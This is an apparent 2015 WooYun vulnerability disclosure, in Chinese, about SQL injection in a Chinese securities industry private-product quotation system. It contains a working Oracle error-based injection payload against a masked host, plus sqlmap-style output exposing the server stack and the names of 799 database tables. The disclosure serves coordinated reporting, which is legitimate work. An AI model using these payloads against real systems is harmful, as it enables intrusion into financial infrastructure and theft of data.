漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:中证机构间报价系统漏洞
提交时间:2015-10-22 09:15
修复时间:2015-12-11 08:22
公开时间:2015-12-11 08:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
简要描述: SQL注入
详细说明: 机构间私募产品报价与服务系统(简称“报价系统”),是经中国证监会批准设立的为机构投资者提供私募产品报价、发行、转让及相关服务的专业化电子平台。
Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-6673 OR 9874=CTXSYS.DRITHSX.SN(9874,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9874=9874) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Nhol21=6 AND 965=965&lmIndex=cyyq
可登录系统:
漏洞证明:
Parameter: #1* (URI) Type: error-based Title: Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-6673 OR 9874=CTXSYS.DRITHSX.SN(9874,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9874=9874) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Nhol21=6 AND 965=965&lmIndex=cyyq Parameter: #2* (URI) Type: error-based Title: Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: http://**.**.**.**:80/lm/trzcs.do?hylb=-4331 OR 4830=CTXSYS.DRITHSX.SN(4830,(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4830=4830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)))-- Snpf1=6 AND 965=965&lmIndex=cyyq --- there were multiple injection points, please select the one to use for following injections: [0] place: URI, parameter: #2*, type: Unescaped numeric (default) [1] place: URI, parameter: #1*, type: Unescaped numeric [q] Quit > [11:15:12] [INFO] the back-end DBMS is Oracle web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: Servlet 2.5, JSP 2.1, Apache 2.2.15 back-end DBMS: Oracle [11:15:12] [INFO] fetching tables for database: 'LIVEBOS' [11:15:13] [INFO] the SQL query used returns 799 entries Database: LIVEBOS [799 tables] +-------------------------------+ | A | | ADDRESSCATEGORY | | B | | BMZX_BMXX | | C | | CPBM | | CZYHYWLB | | DW_CURRENT_STEP | | DW_HISTORY_STEP | | DW_STEP_OWNER | | DW_WFENTRY | | EBS_ORDERHIS | | EXO_GROUP | | EXO_MEMBERSHIP | | EXO_MEMBERSHIP_TYPE | | EXO_NODE_NAVIGATION | | EXO_PAGE | | EXO_PORTAL_CONFIG | | EXO_SERVICE_CONFIG | | EXO_SESSION_LOG | | EXO_USER | | EXO_USER_PROFILE | | FLCPUB_ISSUE_JYCS_PSF | | FLCZJ_JSZH_PLJX | | HYXX_200 | | LBAGILEABNORMALINSTANCE | | LBAGILEABNORMALINSTMANAGER | | LBAGILECURRENTSTEP | | LBAGILEI18NRESOURCE | | LBAGILEMANAGERDETAILINFO | | LBAGILEWFENTRYIDREF | | LBAGILEWFENTRYSCHEMEREF | | LBAGILEWFMANAGEDINFO | | LBAGILEWFRTNOFITYINFO | | LBAGILEWFRTNOTIFYOWNER | | LBAGILEWFRTREASSIGNINFO | | LBAGILEWFRTSTEPPROPERTY | | LBAGILEWFRUNTIMEBASEINFO | | LBAGILEWFRUNTIMECONDITION | | LBAGILEWFRUNTIMEMANAGER | | LBAGILEWFRUNTIMEPROP | | LBAGILEWFRUNTIMESTEP | | LBAGILEWFRUNTIMEVARIABLE | | LBAGILEWFSCHEMERTDEF | | LBAGILEWFSTEPRTCONDITION | | LBAGILEWFSTEPRUNTIMEACTION | | LBAGILEWFSTEPRUNTIMECOLUMN | | LBAGILEWFSTEPRUNTIMECOMMAND | | LBAGILEWFSTEPRUNTIMEFUN | | LBAGILEWFSTEPTIMEOUTPROCESS | | LBAGILEWORKFLOWCATEGORY | | LBAGILEWORKFLOWDEF | | LBAGILEWORKFLOWIDMAP | | LBAGILEWORKFLOWMANAGER | | LBAGILEWORKFLOWRUNTIMEDEF | | LBAUTH | | LBAUTHSCOPE | | LBBIZFUNCTIONDEFS | | LBBIZPROCESSDEFS | | LBBULLETIN | | LBCIPHER | | LBCLUSTERMEMBER | | LBCOLUMNPERMISSION | | LBDATASCOPEAUTH | | LBDEVELOPLOG | | LBDIRECTMESSAGE | | LBFEEDCOMMENT | | LBFEEDEVENT | | LBFEEDEVENTTYPE | | LBFEEDFAVORITE | | LBFEEDFILE | | LBFEEDGROUPHOME | | LBFEEDMENTION | | LBFEEDMESSAGE | | LBFEEDMSGGROUP | | LBFEEDMSGGROUPMEMBER | | LBFEEDMSGTEMPLATE | | LBFEEDOPTIONS | | LBFEEDTOPIC | | LBFEEDTOPICUSER | | LBFUNAUDITSCOPE | | LBFUNAUTHLOG | | LBFUNDEFINITION | | LBFUNFACTOR | | LBFUNPERMISSION | | LBFUNPERMISSIONSCOPE | | LBGROUP | | LBGROUPMEMBER | | LBHISTORYAGILEWORKFLOWDEF | | LBHISTORYBIZPROCESSDEFS | | LBHISTORYMESSAGE | | LBHISTORYWORKOWNERPARAM | | LBHISTORYWORKVARIABLE | | LBKMAUTH | | LBKMCOMMENTRATING | | LBKMDIRECTORY | | LBKMUSERCONTRIBUTE | | LBKMUSERFAVORITE | | LBKMUSERFOLLOW | | LBKNOWLEDGE | | LBKNOWLEDGECOMMENT | | LBKNOWLEDGEPROPERTIES | | LBKNOWLEDGERATE | | LBMAIL | | LBMAILFOLDER | | LBMANAGESCOPE | | LBMEMBER | | LBMENUPORTLET | | LBMENUPORTLETCATEGORY | | LBMESSAGESENDER | | LBMETACOLUMN | | LBMETACOLUMNVALIDATOR | | LBNAVPAGE | | LBNEWSATTACHMENT | | LBNEWSCLASS | | LBNOTIFICATION | | LBNOTIFICATIONOBJECT | | LBNOTIFICATIONOBJECTOPERATE | | LBNOTIFICATIONOPERATES | | LBNOTIFICATIONUSER | | LBOBJECTDEFS | | LBOBJECTPERMISSION | | LBOBJSTATISTIC | | LBOPERATESTATISTIC | | LBORGANIZATION | | LBREPORTFAVORITE | | LBREPORTFILE | | LBREPORTPUBLISHSCHEDULE | | LBREPORTSETTING | | LBREPORTSUBSCRIBE | | LBREPORTUSAGE | | LBRESOURCEBUNDLE | | LBROLE | | LBROLECATEGORY | | LBROLEMUTEX | | LBROLESCOPE | | LBSCHEDULEREFOBJ | | LBSCHEDULEREFOPTION | | LBSCHEDULEVIEW | | LBSCHEDULEVIEWOPTION | | LBSCOPEFACTOR | | LBSCOPEPERMISSION | | LBSEARCHINDEXEX | | LBSESSIONLOCKTICKET | | LBSURROGATE | | LBSURROGATETRUST | | LBSYSCONFIG | | LBSYSVARIABLE | | LBTASK | | LBTASKATTACHMENT | | LBTASKATTACHMENTHIT | | LBTASKAUDITINFO | | LBTASKDEFS | | LBTASKDEFSI18N | | LBTASKFEEDBACK | | LBTASKFEEDBACKRECIPIENT | | LBTASKTAG | | LBTASKUSER | | LBTASKUSERTAG | | LBTICKETREGISTRY | | LBUSERFEED | | LBUSERFEEDSUMMARY | | LBUSERFOLLOWING | | LBUSERMSGCHANNEL | | LBUSERPROJECT | | LBUSERPROJECTCONFIG | | LBUSERWORKFLOWMSG | | LBWEBSERVICESESSION | | LBWFCURRENTOWNER | | LBWFDEFS_I18N | | LBWFNOTIFY | | LBWFNOTIFYMSG | | LBWFSTEPRUNTIMEOWNER | | LBWORKACTIONSTATISTIC | | LBWORKCALENDAR | | LBWORKCOMMUNICATION | | LBWORKCOMMUOWNER | | LBWORKFLOWCONDITIONDEF | | LBWORKFLOWDEF | | LBWORKFLOWHISTORYDEF | | LBWORKFLOWMANAGERDEF | | LBWORKFLOWPROPERTY | | LBWORKFLOWSTEPDEF | | LBWORKFLOWSTEPFUNDEF | | LBWORKFLOWSTEPOWNERDEF | | LBWORKFLOWSUITCONDITIONDEF | | LBWORKOWNERPARAM | | LBWORKSTATISTIC | | LBWORKVARIABLE | | LCDJ_MFQLC_CJ | | LCDJ_MFQLC_LHJ | | LCDJ_MFQLC_YXJ | | LCJYDYXXZX | | LCOTC_BBJDBGSQ | | LCOTC_BBJDBGSQ_SPJL | | LCOTC_BBNJCLSQ | | LCOTC_BBNJCLSQ_SPJL | | LCOTC_BCXY | | LCOTC_BCXY_THJL | | LCOTC_CFJLBD | | LCOTC_CFJLBD_SPJL | | LCOTC_CFJLCXBD | | LCOTC_CFJLCXBD_SPJL | | LCOTC_CJXM | | LCOTC_CONTRACT | | LCOTC_CONTRACT_SPYJ | | LCOTC_CPDJ_LC | | LCOTC_CPDJ_LC_BAK | | LCOTC_CPDJ_LC_CJ | | LCOTC_CPDJ_LC_LHJ | | LCOTC_CPDJ_LC_SPJL | | LCOTC_CPDJ_LC_YXJ | | LCOTC_CPDJ_SG | | LCOTC_CPDJ_SG_BAK | | LCOTC_CPDJ_SG_SPJL | | LCOTC_CPDJ_SZ | | LCOTC_CPDJ_SZ_BAK | | LCOTC_CPDJ_SZ_GSXX | | LCOTC_CPDJ_SZ_SPJL | | LCOTC_CPDJ_YL | | LCOTC_CPDJ_YL_SPJL | | LCOTC_CPDJ_YS | | LCOTC_CPDJ_YS_BAK | | LCOTC_CPDJ_YS_SPJL | | LCOTC_CPDJ_ZZ | | LCOTC_CPDJ_ZZ_GSXX | | LCOTC_CPDJ_ZZ_SPJL | | LCOTC_CPFBXXCX | | LCOTC_CPFBXXCX_SPJL | | LCOTC_CPFBXXXG | | LCOTC_CPFBXXXG_SPJL | | LCOTC_CPJD | | LCOTC_CPJD_BAK | | LCOTC_CPJD_SPJL | | LCOTC_CPXG_LC | | LCOTC_CPXG_LCDJ | | LCOTC_CPXG_LCDJ_SPJL | | LCOTC_CPXG_LC_SPJL | | LCOTC_CPXG_SG | | LCOTC_CPXG_SGDJ | | LCOTC_CPXG_SGDJ_SPJL | | LCOTC_CPXG_SG_SPJL | | LCOTC_CPXG_SZ | | LCOTC_CPXG_SZDJ | | LCOTC_CPXG_SZDJ_GSXX | | LCOTC_CPXG_SZDJ_SPJL | | LCOTC_CPXG_SZ_GSXX | | LCOTC_CPXG_SZ_SPJL | | LCOTC_CPXG_YS | | LCOTC_CPXG_YSDJ | | LCOTC_CPXG_YSDJ_SPJL | | LCOTC_CPXG_YS_SPJL | | LCOTC_CPXG_ZZ | | LCOTC_CPXG_ZZDJ | | LCOTC_CPXG_ZZDJ_GSXX | | LCOTC_CPXG_ZZDJ_SPJL | | LCOTC_CPXG_ZZ_GSXX | | LCOTC_CPXG_ZZ_SPJL | | LCOTC_CPXXFB | | LCOTC_CPXXFB_BAK | | LCOTC_CPXXFB_SPJL | | LCOTC_CPZC_GQJJ | | LCOTC_CPZC_GQJJ_SPJL | | LCOTC_CPZC_GQZC | | LCOTC_CPZC_GQZC_SPJL | | LCOTC_CPZC_LC | | LCOTC_CPZC_LC_BAK | | LCOTC_CPZC_LC_SPJL | | LCOTC_CPZC_QYSG | | LCOTC_CPZC_QYSG_SPJL | | LCOTC_CPZC_SG | | LCOTC_CPZC_SG_BAK | | LCOTC_CPZC_SG_SPJL | | LCOTC_CPZC_SYPZ | | LCOTC_CPZC_SYPZ_SPJL | | LCOTC_CPZC_SZ | | LCOTC_CPZC_SZ_BAK | | LCOTC_CPZC_SZ_GSXX | | LCOTC_CPZC_SZ_SPJL | | LCOTC_CPZC_XMGQ | | LCOTC_CPZC_XMGQ_SPJL | | LCOTC_CPZC_YS | | LCOTC_CPZC_YS_BAK | | LCOTC_CPZC_YS_SPJL | | LCOTC_CPZC_ZCZCZQ | | LCOTC_CPZC_ZCZCZQ_SPJL | | LCOTC_CPZC_ZGCP | | LCOTC_CPZC_ZGCP_SPJL | | LCOTC_CPZC_ZQJJ | | LCOTC_CPZC_ZQJJ_SPJL | | LCOTC_CPZC_ZZ | | LCOTC_CPZC_ZZ_GSXX | | LCOTC_CPZC_ZZ_SPJL | | LCOTC_CPZG | | LCOTC_CPZG_BAK | | LCOTC_CPZG_SPJL | | LCOTC_CPZH_CPZHZTBG_SPJL | | LCOTC_CPZH_SQ | | LCOTC_CPZH_SQ_SPJL | | LCOTC_CPZH_XH | | LCOTC_CPZH_XH_SPJL | | LCOTC_CPZH_ZTBG | | LCOTC_CPZX | | LCOTC_CPZX_BAK | | LCOTC_CPZX_SPJL | | LCOTC_CZYH | | LCOTC_CZYH_SPJL | | LCOTC_DQBGBD | | LCOTC_DQBGBD_SPJL | | LCOTC_FXJLBD | | LCOTC_FXJLBD_SPJL | | LCOTC_FXJLCXBD | | LCOTC_FXJLCXBD_SPJL | | LCOTC_HGCL | | LCOTC_HYHFZZSQBD | | LCOTC_HYHFZZSQBD_SPJL | | LCOTC_HYJH | | LCOTC_HYJH_SPJL | | LCOTC_HYQXBD | | LCOTC_HYQXBD_SPJL | | LCOTC_HYSJ | | LCOTC_HYSJ_SPJL | | LCOTC_HYTCZZSQBD | | LCOTC_HYTCZZSQBD_SPJL | | LCOTC_HYXXXGBD | | LCOTC_HYXXXGBDN | | LCOTC_HYXXXGBDN_GDHHR | | LCOTC_HYXXXGBDN_SPJL | | LCOTC_HYXXXGBDN_SSXH | | LCOTC_HYXXXGBDN_ZYRYXX | | LCOTC_HYXXXGBD_SPJL | | LCOTC_HYZC | | LCOTC_HYZCN | | LCOTC_HYZCN_GDHHR | | LCOTC_HYZCN_SPJL | | LCOTC_HYZCN_SSXH | | LCOTC_HYZCN_YHXGZG | | LCOTC_HYZCN_ZSSYR | | LCOTC_HYZCN_ZYRYXX | | LCOTC_HYZC_SPJL | | LCOTC_JCCP_LC | | LCOTC_JCCP_LC_SPJL | | LCOTC_JLJLBD | | LCOTC_JLJLBD_SPJL | | LCOTC_JLJLCXBD | | LCOTC_JLJLCXBD_SPJL | | LCOTC_JYQRS | | LCOTC_JYQRS_THJL | | LCOTC_JYQRS_XQCS | | LCOTC_JYZZ | | LCOTC_JYZZ_THJL | | LCOTC_LSBGBD | | LCOTC_LSBGBD_SPJL | | LCOTC_LYBZXY | | LCOTC_LYBZXY_THJL | | LCOTC_LYSQ | | LCOTC_LYSQ_SPJL | | LCOTC_NJCLBS | | LCOTC_NJCLBS_SPJL | | LCOTC_PZGL_HF | | LCOTC_PZGL_HF_BAK | | LCOTC_PZGL_HF_SPJL | | LCOTC_PZGL_ZG | | LCOTC_PZGL_ZG_BAK | | LCOTC_PZGL_ZG_SPJL | | LCOTC_QTXY | | LCOTC_QYZXY | | LCOTC_QYZXY_SFJL | | LCOTC_QYZXY_THJL | | LCOTC_SZZS | | LCOTC_SZZS_SPJL | | LCOTC_SZZS_ZSSYR | | LCOTC_TJLYXXSQ | | LCOTC_TJLYXXSQ_SPJL | | LCOTC_TSJLBD | | LCOTC_TSJLBD_SPJL | | LCOTC_TSJLCXBD | | LCOTC_TSJLCXBD_SPJL | | LCOTC_XMGQ_XY | | LCOTC_XMGQ_XY_THJL | | LCOTC_XMGQ_ZRYX | | LCOTC_XMGQ_ZRYX_SHYJ | | LCOTC_XYPJBD | | LCOTC_XYPJBD_SPJL | | LCOTC_XYPJCXBD | | LCOTC_XYPJCXBD_SPJL | | LCOTC_YSPJYQR | | LCOTC_YSPJYQRS | | LCOTC_YSPJYQRS_THJL | | LCOTC_YSPJYQR_SQJL | | LCOTC_YSPJYQR_THYY | | LCOTC_YSPZXY | | LCOTC_YSPZXY_SQJL | | LCOTC_YSPZXY_THYY | | LCOTC_YWBG | | LCOTC_YWBG_SPJL | | LCOTC_ZJZH_SQ | | LCOTC_ZJZH_SQ_SPJL | | LCOTC_ZJZH_XH | | LCOTC_ZJZH_XH_SPJL | | LCOTC_ZJZH_ZTBG | | LCOTC_ZJZH_ZTBG_SPJL | | LCPUB_CPZC_TA | | LCPUB_CPZC_TA_DXJG | | LCPUB_CPZC_TA_SPJL | | LC_APTITUDE_FUN | | LC_APTITUDE_FUN_SPJL | | LC_MEMBER_PURVIEW | | LC_MEMBER_PURVIEW_SPJL | | LSSJ | | OS_CURRENTSTEP | | OS_CURRENTSTEP_PREV | | OS_HISTORYSTEP | | OS_HISTORYSTEP_PREV | | OS_HISTORYWORKFLOWDEFS | | OS_PROPERTYENTRY | | OS_WFENTRY | | OS_WORKFLOWDEFS | | PORTLET | | PORTLET_CATEGORY | | PORTLET_ROLE | | PUB_FIELDTYPE | | PUB_OBJECTTYPE | | PUB_OPERATELOG | | PUB_OPERATION | | PUB_OPERATION_FBAKSET | | PUB_SYSLIST | | QMTJ | | QRTZ_BLOB_TRIGGERS | | QRTZ_CALENDARS | | QRTZ_CRON_TRIGGERS | | QRTZ_FIRED_TRIGGERS | | QRTZ_JOB_DETAILS | | QRTZ_JOB_LISTENERS | | QRTZ_LOCKS | | QRTZ_PAUSED_TRIGGER_GRPS | | QRTZ_SCHEDULER_STATE | | QRTZ_SIMPLE_TRIGGERS | | QRTZ_TRIGGERS | | QRTZ_TRIGGER_LISTENERS | | RESOURCE_BUNDLE_DATA | | SZDJ_MFQLC_FGSXX | | SZ_MFQLC_FGSXX | | SZ_MZCTJ_FGSXX | | T165 | | T185 | | TAUTH | | TAUTHAREA | | TBLOG | | TBLOGCOMMENT | | TBONDINFO | | TCACHE | | TCALENDAR | | TCATEGORYINFO | | TCH_WTSB_WGD_YSP | | TCMDDEF | | TCMDOPER | | TCMDRESTRICT | | TCMDVALIDATE | | TCONFIRM | | TCPGGW | | TCPXXWH | | TCUSTOMSERIAL | | TCUSTUMOPERATE | | TC_BILATERAL_CLEAR_TRADE | | TDJ_CPFE_CON | | TDJ_CPYE_BF | | TDJ_TACJRZ | | TDJ_YJBCLS | | TDJ_ZHLJSY | | TDJ_ZHSYLS | | TDRAWINGITEMS_RULE | | TEMPLET_BAK | | TFIELDDIC | | TFIELDMAP | | TFIELDVALIDATOR | | TFP_CPDM_DXPLFW_BAK | | TFP_CPZXFL | | TFUNDINFO | | TGAME_RESULT | | TGGW | | TIDSERIAL | | TINVESTOR_STATUS | | TLIMITPARAMMAP | | TLIVEBOSSTUDIOINFO | | TLMXCXX | | TMENU | | TMESREFOBJ | | TMESSAGE | | TOBJMODE | | TOPERATEAUDIT | | TOPERLOG | | TOTC_APPDLYZ | | TOTC_BAHY | | TOTC_BATCH | | TOTC_BATCH_ATT | | TOTC_BCXY | | TOTC_BCXY_BAK | | TOTC_BDBMK | | TOTC_BDLX | | TOTC_BDQX | | TOTC_BJJSFZGL | | TOTC_CDQXPZ | | TOTC_CDQXS | | TOTC_CFJL | | TOTC_CONTRACT_CLASS | | TOTC_CONTRACT_CLASS_DETAIL | | TOTC_CONTRACT_OBJECT | | TOTC_CONTRACT_TYPE_CODE | | TOTC_CONTRACT_VARIETY | | TOTC_CPBM | | TOTC_CPBMHDGL | | TOTC_CPBMHDGL_BAK | | TOTC_CPBMJLB | | TOTC_CPBMJLB_BAK_20140630 | | TOTC_CPBM_20140703 | | TOTC_CPBM_BAK | | TOTC_CPBM_BAK_20140630 | | TOTC_CPBM_DJXGLS | | TOTC_CPBM_DJXGLS_BAK_20140630 | | TOTC_CPBM_GJZJY | | TOTC_CPBM_INIT | | TOTC_CPBM_INIT_DJXX | | TOTC_CPBM_SLJL | | TOTC_CPDJ_YHLC | | TOTC_CPFL | | TOTC_CPFL_BAK | | TOTC_CPJZ_BAK | | TOTC_CPLC | | TOTC_CPSP | | TOTC_CPSXPZ | | TOTC_CPZCBD | | TOTC_CPZHXEGL | | TOTC_CZRZ | | TOTC_DCWJ_JG | | TOTC_DHWJ_BASE | | TOTC_DHWJ_BASEANSWER | | TOTC_DOWNCLASS | | TOTC_DQBG | | TOTC_DXJL | | TOTC_DXLS | | TOTC_DXXY | | TOTC_DXYZM | | TOTC_EJH | | TOTC_EJLB | | TOTC_EWJYSJ | | TOTC_EXTSYSTEM | | TOTC_FHYJGBMDJ | | TOTC_FHYJGBMDJ_BAK | | TOTC_FSTJYW | | TOTC_FXJL | | TOTC_FZHYZCDLRZ | | TOTC_GDHHR | | TOTC_GJDM | | TOTC_GLFS | | TOTC_GSJJ | | TOTC_GTBSQK_TEMP | | TOTC_GTCP_SBMX | | TOTC_GTFX | | TOTC_GTHY | | TOTC_HGCL | | TOTC_HQLX | | TOTC_HYCXXX | | TOTC_HYDLQX | | TOTC_HYDLRZ | | TOTC_HYFL | | TOTC_HYHC | | TOTC_HYJB | | TOTC_HYJHLS | | TOTC_HYJSPZ | | TOTC_HYJSPZ_BAK | | TOTC_HYLBYS | | TOTC_HYXX | | TOTC_HYXXXG_LS | | TOTC_HYXXX_20150507 | | TOTC_HYXX_20140820 | | TOTC_HYXX_IMP | | TOTC_HYXX_TEMP | | TOTC_HYXX_TEST | | TOTC_INDUSTRY | | TOTC_INFOSEND | | TOTC_JBXX | | TOTC_JCZCZL | | TOTC_JDBGCS | | TOTC_JGBM | | TOTC_JGBMK | | TOTC_JGDMD | | TOTC_JGXXWH | | TOTC_JHXY | | TOTC_JLJL | | TOTC_JSFS | | TOTC_JYCSB | | TOTC_JYQRS | | TOTC_JYQRS_BAK | | TOTC_JYZZ | | TOTC_LCJK | | TOTC_LCLX | | TOTC_LMCY | | TOTC_LMFW | | TOTC_LMFW_FL | | TOTC_LMGL | | TOTC_LSBG | | TOTC_LSYGTYH | | TOTC_LSZHZC | | TOTC_LYBZXY | | TOTC_LYBZZH | | TOTC_LYCYJB | | TOTC_LYHDGL | | TOTC_LYJBGL | | TOTC_LYWSJLB | | TOTC_LYXXB | | TOTC_LYXXGL | | TOTC_NJCS | | TOTC_NJDA | | TOTC_OUTSYS_MEMEXT | | TOTC_OUTSYS_RESULT | | TOTC_PZLXB | | TOTC_PZXXB | | TOTC_QMS | | TOTC_QQJG | | TOTC_QSGT_XPFL | | TOTC_QTXY | | TOTC_QYBMD | | TOTC_QYGPQYFL | | TOTC_QYGPZC | | TOTC_QYGPZC_GQJG | | TOTC_QYSC_JRZC | | TOTC_SBQSCJRZ | | TOTC_SCBXW | | TOTC_SCBXW_ATTACHMENT | | TOTC_SCBXW_CLASS | | TOTC_SCBXW_COMMENTS | | TOTC_SMHCPFL | | TOTC_SMTHY | | TOTC_SSXH | | TOTC_SXL | | TOTC_SZDBFS | | TOTC_SZFXFW | | TOTC_SZZSSQ | | TOTC_TCPEGL | | TOTC_TMFL | | TOTC_TPZB | | TOTC_TSJL | | TOTC_TZAL | | TOTC_TZBD | | TOTC_TZCL | | TOTC_TZCPLX | | TOTC_TZDXFXYW | | TOTC_TZRXXWH | | TOTC_TZTD | | TOTC_TZZYD | | TOTC_TZZYD_ATTACHMENT | | TOTC_TZZYD_CLASS | | TOTC_TZZYD_COMMENTS | | TOTC_UKDY_JYLS | | TOTC_UKEYIC | | TOTC_UKEY_CAPTCHA | | TOTC_WEBLCZX | | TOTC_WEBLCZX_BAK | | TOTC_WEBXX | | TOTC_WEBXX_ATTACHMENT | | TOTC_WEBXX_CLASS | | TOTC_WEBXX_COMMENTS | | TOTC_WEBXX_MK | | TOTC_WEBXX_XGSP | | TOTC_WTZCZL | | TOTC_WZSL | | TOTC_XGLJ | | TOTC_XGLJ_CLASS | | TOTC_XGLM | | TOTC_XGYWZG | | TOTC_XMGL_BAK | | TOTC_XMGQXY | | TOTC_XTJSPZ | | TOTC_XXPLFL | | TOTC_XXTX | | TOTC_XYFQ | | TOTC_XYPJ | | TOTC_XYQY | | TOTC_XZQYDM | | TOTC_XZZX | | TOTC_XZZX_CLASS | | TOTC_YGHYDLRZ | | TOTC_YGTQD | | TOTC_YGYH | | TOTC_YHGTGX | | TOTC_YJLB | | TOTC_YSPBCXY | | TOTC_YSPJYQRS | | TOTC_YSPZXY | | TOTC_YWLB | | TOTC_YWQXPZ | | TOTC_YWQXZZQD | | TOTC_YXBBJDBG_LS | | TOTC_YXBBNJCL_LS | | TOTC_ZDSXJBXX | | TOTC_ZFZH | | TOTC_ZMXW | | TOTC_ZMXW_ATTACHMENT | | TOTC_ZMXW_CLASS | | TOTC_ZMXW_COMMENTS | | TOTC_ZMXW_FBHSP | | TOTC_ZQCPLX | | TOTC_ZQGS_GGW | | TOTC_ZQGS_XXFB | | TOTC_ZQGS_XXFBN | | TOTC_ZQJGLX | | TOTC_ZSSYR | | TOTC_ZSXY | | TOTC_ZSYW | | TOTC_ZTHY | | TOTC_ZTHYLM | | TOTC_ZTJJ | | TOTC_ZXPXKCB | | TOTC_ZXPXKCB_KCDG | | TOTC_ZXY | | TOTC_ZXYGZLZD | | TOTC_ZXYLSSJ | | TOTC_ZXYLSSJJG | | TOTC_ZXYLSSJJG_BAK | | TOTC_ZXY_BAK | | TOTC_ZYHXX | | TOTC_ZYHXX_20150507 | | TOTC_ZYRYXX | | TOTC_ZYRZ_CZRZ | | TOTC_ZYRZ_DQHG | | TOTC_ZYRZ_TQZZ | | TOTC_ZYRZ_WYJL | | TOTC_ZZCZRZ | | TOUTOBJ | | TPRIZE_RESULT | | TPRIZE_SET | | TPUB_CPLB | | TPUB_CPLB_SXXX | | TPUB_DATASOURCE | | TPUB_EXU_SET | | TPUB_SETP_SET | | TQMENT | | TQMENT_ANSWER | | TQUERYCONDITION | | TQUERYFIELD | | TQUERYGROUP | | TQUERYLINK | | TQUERYORDER | | TQUERYREF | | TRECEIVERMES | | TRECYCLE | | TRECYCLETYPE | | TRELATIONOBJ | | TROLE | | TROUND | | TSCHEDULE | | TSCHEDULEAUDIT | | TSCHEDULEDEF | | TSCHEDULEOPTION | | TSCHEDULEPARTICIPATOR | | TSCORE_DETAIL | | TSCORE_FUNCTION | | TSEQUENCE | | TSTRUCTUREDPRODUCT | | TSTRUCTUREDSCHEMA | | TST_ZHGX | | TSYCSKZ | | TSYSDBBACK | | TSYSPARAM | | TTABLE | | TTABLEHISTORY | | TTABLEOBJ | | TTABLEOBJHISTORY | | TTRANS | | TTRANSFERCOMMISSIONCFM | | TUSER | | TUSERLOG | | TUSERPREFERENCES | | TUSER_20150507 | | TVIEWCONDITION | | TVIEWOBJ | | TVIEWOBJHISTORY | | TXTDM | | TXTDM_I18N | | TZJ_WBJSZH_CS | | T_APTITUDE_FUN | | T_AUTOMESS | | T_DR | | T_FUNCTION | | T_FUNCTION_TREE | | T_MEMBER_APTITUDE | | T_MEMBER_PURVIEW | | T_MEMBER_USER_PURVIEW | | T_OPERATE_LOG | | T_USERTYPE_DEFAULT | | T_USERTYPE_PERMISS | | T_USERTYPE_PURVIEW | | WF_INITIATOR | | XTQMTJ | | ZJHMYH | | ZZDJ_MFQLC_FGSXX | | ZZLBTEMP | | ZZ_MFQLC_FGSXX | +-------------------------------+
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:11
确认时间:2015-10-27 08:20
厂商回复: CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.
最新状态: 暂无